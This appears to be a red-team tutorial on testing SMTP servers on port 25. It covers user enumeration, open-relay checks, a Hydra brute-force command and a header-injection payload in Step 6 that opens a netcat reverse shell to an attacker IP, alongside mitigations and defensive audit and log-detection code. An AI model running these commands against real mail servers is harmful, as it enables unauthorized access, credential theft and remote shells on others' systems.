SMTP Pentest Notes - Port 25

Pivoting for Red Teamers

SMTP Pentesting Notes

SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass.

Step 1: Enumerate the SMTP Server

Connect to the SMTP server using Telnet:

telnet <target-ip> 25

Look for the server banner, which may reveal its version and configuration.

Step 2: User Enumeration with VRFY & EXPN

Check if the server allows user verification:

VRFY admin
EXPN postmaster

If the server answers 250 (or 251), it is confirming that the account exists, which discloses valid user names and aids later brute-force attacks. A 252 reply means the server will not verify the address but will accept mail for it, which discloses nothing, and a 502 reply means the command is disabled.

Step 3: Open Relay Testing

To check if the server allows unauthenticated email forwarding:

MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject: Open Relay Test

This is a test message.
.

If the message is delivered, the server is an open relay and can be abused for spam or phishing. For the test to be meaningful, the RCPT TO address must be at a domain the server does not host itself; a server that accepts mail for its own users is delivering, not relaying.
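As an added example (not part of the original notes), here is the decision logic behind Steps 2 and 3 in Python, written for auditing a server you administer: it parses SMTP replies, including multi-line ones, and applies reply-code semantics so that a 252 to VRFY is not counted as disclosure and a 250 to RCPT TO counts as relaying only when the recipient's domain is not one the server hosts. The `local_domains` set and the sample replies are constructed assumptions.

```python
import re

REPLY_LINE = re.compile(r"^(\d{3})([ -])(.*)$")   # code, then "-" (more follows) or " " (last line)

def parse_reply(lines):
    """Parse a single- or multi-line SMTP reply into (code, [text, ...])."""
    code, texts = None, []
    for line in lines:
        m = REPLY_LINE.match(line)
        if not m:
            raise ValueError(f"malformed reply line: {line!r}")
        code = code or int(m.group(1))
        texts.append(m.group(3))
        if m.group(2) == " ":          # final line of the reply
            return code, texts
    raise ValueError("reply was not terminated")

# What a VRFY/EXPN reply code actually tells an auditor (RFC 5321 semantics).
VRFY_VERDICT = {250: "disclosed", 251: "disclosed",       # server confirmed the mailbox or list exists
                252: "not verified",                      # "cannot verify, will accept mail": no disclosure
                550: "unknown user", 551: "unknown user", 553: "unknown user",  # negative, but still informative
                500: "disabled", 502: "disabled"}         # command not implemented / switched off

def classify_vrfy(code):
    return VRFY_VERDICT.get(code, f"other ({code})")

def relay_accepted(rcpt_code, recipient, local_domains):
    """True only if a recipient outside the server's own domains was accepted."""
    domain = recipient.rsplit("@", 1)[-1].lower()
    return rcpt_code in (250, 251) and domain not in local_domains

def audit(replies, local_domains):
    """Map each probe command to a verdict; `replies` is {command: [reply lines]}."""
    verdicts = {}
    for command, lines in replies.items():
        code, _ = parse_reply(lines)
        verb = command.split(None, 1)[0].upper()
        if verb in ("VRFY", "EXPN"):
            verdicts[command] = classify_vrfy(code)
        elif verb == "RCPT":
            rcpt = command.split("<", 1)[1].rstrip(">")
            verdicts[command] = "relay accepted" if relay_accepted(code, rcpt, local_domains) else "relay denied or local delivery"
    return verdicts
# Constructed replies in the shape a server would send them (not captured from a real host).
SAMPLE_REPLIES = {
    "VRFY admin": ["250 2.1.5 admin <admin@example.com>"],
    "EXPN postmaster": ["252 2.1.5 Cannot EXPN, but will accept message and attempt delivery"],
    "RCPT TO:<victim@example.net>": ["454 4.7.1 <victim@example.net>: Relay access denied"],
}
```

Run `audit(SAMPLE_REPLIES, {"example.com"})` to see the three verdicts; swap in the replies captured from your own server to check it.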

Step 4: Brute-Forcing SMTP Authentication

Use Hydra to attempt brute-force login:

hydra -L users.txt -P passwords.txt smtp://<target-ip> -s 25

If credentials are found, they may be used for unauthorized email access or further exploitation.

Step 5: Finding SMTP Vulnerabilities

Check the server banner for version details:

220 mail.example.com ESMTP Postfix 2.9.6

Search for known vulnerabilities:

searchsploit postfix

Refer to databases such as:

Step 6: Privilege Escalation via Misconfigured Mail Scripts

If the mail server passes addresses or headers to external scripts or a shell without sanitising them, it may be possible to execute commands remotely:

From: "|/bin/bash -c 'nc -e /bin/bash <attacker-ip> 4444'"
To: admin@example.com
Subject: Exploit Test

If vulnerable, this could lead to Remote Code Execution (RCE).

Mitigation Recommendations

  • Disable VRFY & EXPN to prevent user enumeration.
  • Require authentication to prevent unauthorized access.
  • Close open relays to block email abuse.
  • Enable logging & monitoring to detect suspicious activity.
  • Keep software updated to mitigate known vulnerabilities.
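To make the "logging & monitoring" recommendation concrete, the following added example (not from the original notes) runs simple detection logic over constructed Postfix-style smtpd log lines: repeated SASL authentication failures from one client (Step 4), rejected relay attempts (Step 3), and bursts of unknown-recipient rejects, which is how RCPT TO-based user enumeration appears in the log. The log lines, IPs and thresholds are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed lines in Postfix syslog style; none come from a real server.
SAMPLE_LOG = """\
Mar  3 10:01:02 mail postfix/smtpd[2201]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Mar  3 10:01:03 mail postfix/smtpd[2201]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Mar  3 10:01:04 mail postfix/smtpd[2201]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Mar  3 10:02:10 mail postfix/smtpd[2202]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 454 4.7.1 <victim@example.net>: Relay access denied; from=<attacker@example.com> to=<victim@example.net> proto=ESMTP helo=<scanner>
Mar  3 10:03:11 mail postfix/smtpd[2203]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <bob@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.com> to=<bob@example.com> proto=ESMTP helo=<scanner>
Mar  3 10:03:12 mail postfix/smtpd[2203]: NOQUEUE: reject: RCPT from unknown[198.51.100.9]: 550 5.1.1 <carol@example.com>: Recipient address rejected: User unknown in local recipient table; from=<a@example.com> to=<carol@example.com> proto=ESMTP helo=<scanner>
Mar  3 10:05:00 mail postfix/smtpd[2204]: 4AB12C: client=host.example.org[192.0.2.20], sasl_method=LOGIN, sasl_username=alice
"""

CLIENT_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")   # first bracketed IPv4 = connecting client
AUTH_FAIL = re.compile(r"SASL \S+ authentication failed")

def analyse(log_text, auth_threshold=3, probe_threshold=2):
    """Return {client_ip: [finding, ...]} for clients whose activity matches the
    abuse patterns in the notes: auth brute force, relay probes, RCPT-based enumeration."""
    auth_fail, relay_denied, unknown_rcpt = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        m = CLIENT_IP.search(line)
        if not m:
            continue
        ip = m.group(1)
        if AUTH_FAIL.search(line):
            auth_fail[ip] += 1
        elif "Relay access denied" in line:          # server refused to relay for this client
            relay_denied[ip] += 1
        elif "User unknown in local recipient table" in line:   # RCPT TO used to guess valid users
            unknown_rcpt[ip] += 1
    findings = defaultdict(list)
    for ip, n in auth_fail.items():
        if n >= auth_threshold:
            findings[ip].append(f"auth brute-force suspected: {n} SASL failures")
    for ip, n in relay_denied.items():
        findings[ip].append(f"open-relay probe: {n} relay attempt(s) rejected")
    for ip, n in unknown_rcpt.items():
        if n >= probe_threshold:
            findings[ip].append(f"recipient enumeration suspected: {n} unknown-recipient rejects")
    return dict(findings)

if __name__ == "__main__":
    for ip, items in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(items))
```

The successful, authenticated session from 192.0.2.20 produces no finding, so the output only names the two probing clients.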

Conclusion

SMTP servers can be an attacker's entry point if not properly secured. Understanding and testing for vulnerabilities ensures a more secure email infrastructure.
